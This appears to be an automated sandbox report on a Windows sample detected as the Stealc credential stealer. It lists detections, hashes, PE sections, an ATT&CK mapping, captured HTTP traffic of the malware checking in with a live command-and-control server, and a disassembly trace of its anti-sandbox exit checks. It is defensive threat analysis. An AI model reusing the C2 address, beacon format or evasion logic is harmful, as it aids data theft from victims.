                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2031125996.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5644, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/-zx3file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37ofile.exe, 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpWCG3file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37file.exe, 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.php;Cc3file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/z%file.exe, 00000000.00000002.2075749076.00000000013D2000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/wsfile.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.37
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1538205
                          Start date and time:2024-10-20 20:13:05 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 2m 46s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:2
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 85
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • VT rate limit hit for: file.exe

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.948679847936417
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'818'624 bytes
                          MD5:ffe1a72c9e5e3aa49aaba14b27f0e4ad
                          SHA1:ec14b0a1a2d5ed374394f41667084bb1c48307c1
                          SHA256:315bf34c13238a2fa2f083ecd2bd6f440674ba5b8b5db199c1b35c9724e0e4bb
                          SHA512:19b20de29267244f14aa3d3e836b22d85c41a15a9131cf20f1b179042b3ca0a77d831e40da8c6f34fceee9fe67fc5179b1decfe0a1a28dfed02079dc3a784c8e
                          SSDEEP:49152:b5VdfxYow/QaL88AVFIffYqr3eAsuTZY7:b5bxYh88ASfAqzNsaZM
                          TLSH:8E8533136F3253E8E56C907C1499AC4AB7348E989B9C37F5FB058273D99F688D762203
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0xa8b000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007F0BF881510Ah
                          setle byte ptr [ebx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], cl
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ebx], al
                          or al, byte ptr [eax]
                          add byte ptr [esi], al
                          or al, byte ptr [eax]
                          add byte ptr [edx], al
                          or al, byte ptr [eax]
                          add byte ptr [edx+ecx], al
                          add byte ptr [eax], al
                          add dword ptr [edx], ecx
                          add byte ptr [eax], al
                          or ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x25b0000x228002b2b0f3272a39a005b96cca98930b581unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x25e0000x2960000x2009749b141140719de59347f3dba0551e1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          atgdqvtb0x4f40000x1960000x195e00d1c27a9a076a57bbe6aace1cac507a12False0.9950946306205728data7.954841029285802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          eqelhmzu0x68a0000x10000x400dc14894cc7cdacc3f1062be197d39a5cFalse0.75data6.168863599859574IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x68b0000x30000x2200fc1776110b40f0c4329d29b45280cf8fFalse0.06238511029411765DOS executable (COM)0.7795115145692763IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-20T20:13:57.397393+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 20, 2024 20:13:55.865483046 CEST4970480192.168.2.5185.215.113.37
                          Oct 20, 2024 20:13:55.870397091 CEST8049704185.215.113.37192.168.2.5
                          Oct 20, 2024 20:13:55.870505095 CEST4970480192.168.2.5185.215.113.37
                          Oct 20, 2024 20:13:55.870619059 CEST4970480192.168.2.5185.215.113.37
                          Oct 20, 2024 20:13:55.875355959 CEST8049704185.215.113.37192.168.2.5
                          Oct 20, 2024 20:13:57.027656078 CEST8049704185.215.113.37192.168.2.5
                          Oct 20, 2024 20:13:57.027831078 CEST4970480192.168.2.5185.215.113.37
                          Oct 20, 2024 20:13:57.044944048 CEST4970480192.168.2.5185.215.113.37
                          Oct 20, 2024 20:13:57.049820900 CEST8049704185.215.113.37192.168.2.5
                          Oct 20, 2024 20:13:57.397214890 CEST8049704185.215.113.37192.168.2.5
                          Oct 20, 2024 20:13:57.397392988 CEST4970480192.168.2.5185.215.113.37
                          Oct 20, 2024 20:14:00.961658001 CEST4970480192.168.2.5185.215.113.37

                          HTTP Request Dependency Graph

                          • 185.215.113.37

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.549704185.215.113.37805644C:\Users\user\Desktop\file.exe
                          TimestampBytes transferredDirectionData
                          Oct 20, 2024 20:13:55.870619059 CEST89OUTGET / HTTP/1.1
                          Host: 185.215.113.37
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Oct 20, 2024 20:13:57.027656078 CEST203INHTTP/1.1 200 OK
                          Date: Sun, 20 Oct 2024 18:13:56 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Oct 20, 2024 20:13:57.044944048 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE
                          Host: 185.215.113.37
                          Content-Length: 211
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 34 35 30 34 37 36 44 44 43 31 33 33 33 32 37 34 33 38 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a
                          Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="hwid"A4450476DDC13332743865------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="build"doma------IIJEBFCFIJJJEBGDBAKE--
                          Oct 20, 2024 20:13:57.397214890 CEST210INHTTP/1.1 200 OK
                          Date: Sun, 20 Oct 2024 18:13:57 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Content-Length: 8
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 59 6d 78 76 59 32 73 3d
                          Data Ascii: YmxvY2s=


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          System Behavior

                          General

                          Target ID:0
                          Start time:14:13:53
                          Start date:20/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x680000
                          File size:1'818'624 bytes
                          MD5 hash:FFE1A72C9E5E3AA49AABA14B27F0E4AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2031125996.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:9.7%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:24
                            execution_graph 13442 6969f0 13487 682260 13442->13487 13466 696a64 13467 69a9b0 4 API calls 13466->13467 13468 696a6b 13467->13468 13469 69a9b0 4 API calls 13468->13469 13470 696a72 13469->13470 13471 69a9b0 4 API calls 13470->13471 13472 696a79 13471->13472 13473 69a9b0 4 API calls 13472->13473 13474 696a80 13473->13474 13639 69a8a0 13474->13639 13476 696a89 13477 696b0c 13476->13477 13479 696ac2 OpenEventA 13476->13479 13643 696920 GetSystemTime 13477->13643 13481 696ad9 13479->13481 13482 696af5 CloseHandle Sleep 13479->13482 13486 696ae1 CreateEventA 13481->13486 13484 696b0a 13482->13484 13484->13476 13486->13477 13840 6845c0 13487->13840 13489 682274 13490 6845c0 2 API calls 13489->13490 13491 68228d 13490->13491 13492 6845c0 2 API calls 13491->13492 13493 6822a6 13492->13493 13494 6845c0 2 API calls 13493->13494 13495 6822bf 13494->13495 13496 6845c0 2 API calls 13495->13496 13497 6822d8 13496->13497 13498 6845c0 2 API calls 13497->13498 13499 6822f1 13498->13499 13500 6845c0 2 API calls 13499->13500 13501 68230a 13500->13501 13502 6845c0 2 API calls 13501->13502 13503 682323 13502->13503 13504 6845c0 2 API calls 13503->13504 13505 68233c 13504->13505 13506 6845c0 2 API calls 13505->13506 13507 682355 13506->13507 13508 6845c0 2 API calls 13507->13508 13509 68236e 13508->13509 13510 6845c0 2 API calls 13509->13510 13511 682387 13510->13511 13512 6845c0 2 API calls 13511->13512 13513 6823a0 13512->13513 13514 6845c0 2 API calls 13513->13514 13515 6823b9 13514->13515 13516 6845c0 2 API calls 13515->13516 13517 6823d2 13516->13517 13518 6845c0 2 API calls 13517->13518 13519 6823eb 13518->13519 13520 6845c0 2 API calls 13519->13520 13521 682404 13520->13521 13522 6845c0 2 API calls 13521->13522 13523 68241d 13522->13523 13524 6845c0 2 API calls 13523->13524 13525 682436 13524->13525 13526 6845c0 2 API calls 13525->13526 13527 68244f 13526->13527 13528 6845c0 2 API calls 13527->13528 13529 682468 13528->13529 13530 6845c0 2 API calls 13529->13530 13531 682481 13530->13531 13532 6845c0 2 API calls 13531->13532 13533 68249a 13532->13533 13534 6845c0 2 API calls 13533->13534 13535 6824b3 13534->13535 13536 6845c0 2 API calls 13535->13536 13537 6824cc 13536->13537 13538 6845c0 2 API calls 13537->13538 13539 6824e5 13538->13539 13540 6845c0 2 API calls 13539->13540 13541 6824fe 13540->13541 13542 6845c0 2 API calls 13541->13542 13543 682517 13542->13543 13544 6845c0 2 API calls 13543->13544 13545 682530 13544->13545 13546 6845c0 2 API calls 13545->13546 13547 682549 13546->13547 13548 6845c0 2 API calls 13547->13548 13549 682562 13548->13549 13550 6845c0 2 API calls 13549->13550 13551 68257b 13550->13551 13552 6845c0 2 API calls 13551->13552 13553 682594 13552->13553 13554 6845c0 2 API calls 13553->13554 13555 6825ad 13554->13555 13556 6845c0 2 API calls 13555->13556 13557 6825c6 13556->13557 13558 6845c0 2 API calls 13557->13558 13559 6825df 13558->13559 13560 6845c0 2 API calls 13559->13560 13561 6825f8 13560->13561 13562 6845c0 2 API calls 13561->13562 13563 682611 13562->13563 13564 6845c0 2 API calls 13563->13564 13565 68262a 13564->13565 13566 6845c0 2 API calls 13565->13566 13567 682643 13566->13567 13568 6845c0 2 API calls 13567->13568 13569 68265c 13568->13569 13570 6845c0 2 API calls 13569->13570 13571 682675 13570->13571 13572 6845c0 2 API calls 13571->13572 13573 68268e 13572->13573 13574 699860 13573->13574 13845 699750 GetPEB 13574->13845 13576 699868 13577 699a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13576->13577 13580 69987a 13576->13580 13578 699b0d 13577->13578 13579 699af4 GetProcAddress 13577->13579 13581 699b46 13578->13581 13582 699b16 GetProcAddress GetProcAddress 13578->13582 13579->13578 13583 69988c 21 API calls 13580->13583 13584 699b68 13581->13584 13585 699b4f GetProcAddress 13581->13585 13582->13581 13583->13577 13586 699b89 13584->13586 13587 699b71 GetProcAddress 13584->13587 13585->13584 13588 696a00 13586->13588 13589 699b92 GetProcAddress GetProcAddress 13586->13589 13587->13586 13590 69a740 13588->13590 13589->13588 13591 69a750 13590->13591 13592 696a0d 13591->13592 13593 69a77e lstrcpy 13591->13593 13594 6811d0 13592->13594 13593->13592 13595 6811e8 13594->13595 13596 68120f ExitProcess 13595->13596 13597 681217 13595->13597 13598 681160 GetSystemInfo 13597->13598 13599 68117c ExitProcess 13598->13599 13600 681184 13598->13600 13601 681110 GetCurrentProcess VirtualAllocExNuma 13600->13601 13602 681149 13601->13602 13603 681141 ExitProcess 13601->13603 13846 6810a0 VirtualAlloc 13602->13846 13606 681220 13850 6989b0 13606->13850 13609 681249 __aulldiv 13610 68129a 13609->13610 13611 681292 ExitProcess 13609->13611 13612 696770 GetUserDefaultLangID 13610->13612 13613 6967d3 13612->13613 13614 696792 13612->13614 13620 681190 13613->13620 13614->13613 13615 6967cb ExitProcess 13614->13615 13616 6967ad ExitProcess 13614->13616 13617 6967c1 ExitProcess 13614->13617 13618 6967a3 ExitProcess 13614->13618 13619 6967b7 ExitProcess 13614->13619 13621 6978e0 3 API calls 13620->13621 13622 68119e 13621->13622 13623 6811cc 13622->13623 13624 697850 3 API calls 13622->13624 13627 697850 GetProcessHeap RtlAllocateHeap GetUserNameA 13623->13627 13625 6811b7 13624->13625 13625->13623 13626 6811c4 ExitProcess 13625->13626 13628 696a30 13627->13628 13629 6978e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13628->13629 13630 696a43 13629->13630 13631 69a9b0 13630->13631 13852 69a710 13631->13852 13633 69a9c1 lstrlen 13635 69a9e0 13633->13635 13634 69aa18 13853 69a7a0 13634->13853 13635->13634 13637 69a9fa lstrcpy lstrcat 13635->13637 13637->13634 13638 69aa24 13638->13466 13640 69a8bb 13639->13640 13641 69a90b 13640->13641 13642 69a8f9 lstrcpy 13640->13642 13641->13476 13642->13641 13857 696820 13643->13857 13645 69698e 13646 696998 sscanf 13645->13646 13886 69a800 13646->13886 13648 6969aa SystemTimeToFileTime SystemTimeToFileTime 13649 6969e0 13648->13649 13651 6969ce 13648->13651 13652 695b10 13649->13652 13650 6969d8 ExitProcess 13651->13649 13651->13650 13653 695b1d 13652->13653 13654 69a740 lstrcpy 13653->13654 13655 695b2e 13654->13655 13888 69a820 lstrlen 13655->13888 13658 69a820 2 API calls 13659 695b64 13658->13659 13660 69a820 2 API calls 13659->13660 13661 695b74 13660->13661 13892 696430 13661->13892 13664 69a820 2 API calls 13665 695b93 13664->13665 13666 69a820 2 API calls 13665->13666 13667 695ba0 13666->13667 13668 69a820 2 API calls 13667->13668 13669 695bad 13668->13669 13670 69a820 2 API calls 13669->13670 13671 695bf9 13670->13671 13901 6826a0 13671->13901 13679 695cc3 13680 696430 lstrcpy 13679->13680 13681 695cd5 13680->13681 13682 69a7a0 lstrcpy 13681->13682 13683 695cf2 13682->13683 13684 69a9b0 4 API calls 